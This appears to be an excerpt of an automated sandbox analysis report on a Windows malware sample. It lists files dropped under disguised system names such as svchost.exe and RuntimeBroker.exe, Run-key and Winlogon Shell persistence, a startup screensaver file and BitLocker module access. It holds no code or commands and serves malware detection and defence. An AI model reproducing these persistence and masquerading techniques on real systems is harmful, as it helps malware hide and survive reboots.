                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\KBGuTvrT.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76842\unicodedata.pydJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\moRxsLqL.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Program Files\Uninstall Information\cmd.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\IIrMizFV.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\unicodedata.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68642\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76842\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76842\_hashlib.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76842\select.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76842\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\libffi-7.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\_sqlite3.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68642\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\RhnciprG.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68642\_bz2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\nCAYcgzI.logJump to dropped file
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeFile created: C:\Users\user\AppData\Roaming\RuntimeBroker.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\sqlite3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68642\select.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\_ssl.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68642\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\BhVFUouj.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76842\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\kuPhBLMV.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68642\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\python310.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\rar.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\PyvtgeZE.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\rtqOkdzB.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68642\unicodedata.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\NuVdFscS.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeFile created: C:\ProgramData\Microsoft\based.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\iGLZQxQX.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\pYJguVIM.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68642\_socket.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\XSgjglWp.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76842\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\vosgrJpv.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\dTtanABj.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\select.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\shuXVqvz.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\FOowrzbf.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeFile created: C:\ProgramData\Microsoft\hacn.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\DLBNVQXk.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\cscript.exeJump to dropped file
                                  Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeFile created: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76842\_bz2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\FGEdMQBa.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\_ctypes.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\gEYquOMc.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76842\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\_queue.pydJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68642\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\_lzma.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68642\python310.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\PGfLLOAK.logJump to dropped file
                                  Source: C:\ProgramData\setup.exeFile created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\libssl-1_1.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77042\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeFile created: C:\ProgramData\Microsoft\based.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeFile created: C:\ProgramData\Microsoft\hacn.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\cscript.exeJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\iGLZQxQX.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\XSgjglWp.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\FGEdMQBa.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\moRxsLqL.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\shuXVqvz.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\IIrMizFV.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\PGfLLOAK.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\vosgrJpv.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\pYJguVIM.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\BhVFUouj.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\rtqOkdzB.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\ZlZjQqUm.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\PyvtgeZE.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\nCAYcgzI.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\NuVdFscS.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\DLBNVQXk.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\kuPhBLMV.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\RhnciprG.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\gEYquOMc.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\FOowrzbf.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\dTtanABj.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\Desktop\KBGuTvrT.logJump to dropped file

                                  Boot Survival

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell "C:\Users\user\NetHood\powershell.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cscript
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RKjtGQcyio
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Users\user\cscript.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cscript
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cscript
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cscript
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cscript
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run powershell
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RKjtGQcyio
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RKjtGQcyio
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dasHost

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: C:\ProgramData\setup.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0550B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00007FF72B0550B0
